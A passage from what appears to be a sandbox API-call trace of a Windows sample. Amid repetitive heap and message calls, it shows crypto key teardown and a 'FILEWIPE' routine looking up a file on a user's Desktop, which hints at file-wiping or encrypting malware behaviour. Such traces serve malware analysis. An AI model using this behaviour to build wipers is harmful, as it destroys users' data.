lpMsg=0x6ae83c) returned 0 [0030.634] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.634] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0030.634] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.634] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.634] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.634] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.634] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0030.634] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1be8 | out: hHeap=0x770000) returned 1 [0030.634] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0030.634] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0030.634] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0030.634] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0030.634] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0030.634] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0030.634] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0030.634] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0030.634] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0030.634] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0030.634] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0030.634] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0030.634] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0030.634] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0030.635] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0030.635] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0030.635] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0030.635] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0030.635] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0030.635] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.635] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.635] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.635] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0030.635] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.636] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.636] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.636] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0030.636] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0030.636] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0030.636] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0030.636] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0030.636] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0030.636] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0030.636] PeekMessageW (in: lpMsg=0x6ae3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3fc) returned 0 [0030.636] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0030.636] CryptDestroyKey (hKey=0x7c21c0) returned 1 [0030.636] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0030.636] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0030.636] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0030.636] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1800 | out: hHeap=0x770000) returned 1 [0030.637] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0030.637] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0030.637] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0030.637] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0030.637] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0030.637] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0030.637] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0030.637] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0030.637] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cec8 | out: hHeap=0x770000) returned 1 [0030.637] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0030.637] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0030.637] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0030.637] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0030.637] PeekMessageW (in: lpMsg=0x6ae3d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3d4) returned 0 [0030.637] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0030.637] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c21c0 | out: hHeap=0x770000) returned 1 [0030.637] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0030.637] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0030.637] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0030.637] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0030.637] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0030.637] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.637] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0030.637] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1ad0 | out: hHeap=0x770000) returned 1 [0030.637] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0030.637] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.637] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0030.637] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0030.637] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0030.637] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0030.637] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0030.638] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0030.638] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0030.638] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.638] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0030.638] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0030.638] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da208 | out: hHeap=0x770000) returned 1 [0030.638] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0030.638] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.638] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0030.638] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0030.638] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da208 | out: hHeap=0x770000) returned 1 [0030.638] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0030.638] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0030.638] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1698 | out: hHeap=0x770000) returned 1 [0030.638] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da208 | out: hHeap=0x770000) returned 1 [0030.638] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0030.638] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0030.638] CryptReleaseContext (hProv=0x7d5b30, dwFlags=0x0) returned 1 [0030.638] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.638] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0030.638] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0030.638] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0030.638] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0030.639] FreeLibrary (hLibModule=0x754b0000) returned 1 [0030.639] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0030.639] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1ad0 | out: hHeap=0x770000) returned 1 [0030.639] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.639] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c21c0 | out: hHeap=0x770000) returned 1 [0030.639] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.639] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0030.639] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0030.639] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.640] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.640] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.641] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0030.641] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0030.641] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1aa8 | out: hHeap=0x770000) returned 1 [0030.641] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0030.641] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.641] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.641] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\ClVeU\\AtELWG4 7FDtQ.swf", lpFindFileData=0x6ae7a0 | out: lpFindFileData=0x6ae7a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb93c3970, ftCreationTime.dwHighDateTime=0x1d5c366, ftLastAccessTime.dwLowDateTime=0xe2c02960, ftLastAccessTime.dwHighDateTime=0x1d5beb5, ftLastWriteTime.dwLowDateTime=0xe2c02960, ftLastWriteTime.dwHighDateTime=0x1d5beb5, nFileSizeHigh=0x0, nFileSizeLow=0x4857, dwReserved0=0x0, dwReserved1=0x777648, cFileName="AtELWG4 7FDtQ.swf", cAlternateFileName="ATELWG~1.SWF")) returned 0x7c2100 [0030.641] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0030.641] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0030.641] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0030.641] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1878 | out: hHeap=0x770000) returned 1 [0030.641] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0030.641] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.641] CharLowerBuffW (in: lpsz="byte[18519]", cchLength=0xb | out: lpsz="byte[18519]") returned 0xb [0030.642] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.642] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0030.642] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0030.642] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0030.642] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.642] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0030.642] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x76b40000 [0030.642] FreeLibrary (hLibModule=0x76b40000) returned 1 [0030.642] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0030.642] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0030.642] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0030.642] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1968 | out: hHeap=0x770000) returned 1 [0030.642] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c10 | out: hHeap=0x770000) returned 1 [0030.642] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af538 | out: hHeap=0x770000) returned 1 [0030.642] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0030.642] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0030.642] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0030.643] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0030.643] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0030.643] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0030.643] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0030.643] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0030.643] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0030.643] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0030.643] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0030.643] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0030.643] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0030.643] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb68 | out: hHeap=0x770000) returned 1 [0030.643] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7f0 | out: hHeap=0x770000) returned 1 [0030.643] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0030.643] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0030.643] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0030.643] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0030.643] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0030.643] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: hHeap=0x770000) returned 1 [0030.643] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0030.643] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0030.643] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.643] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.643] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.643] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0030.643] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.643] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.643] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.643] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.643] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.643] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.643] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.644] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.644] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.644] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.644] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.644] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.644] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.644] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.644] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.644] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.644] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 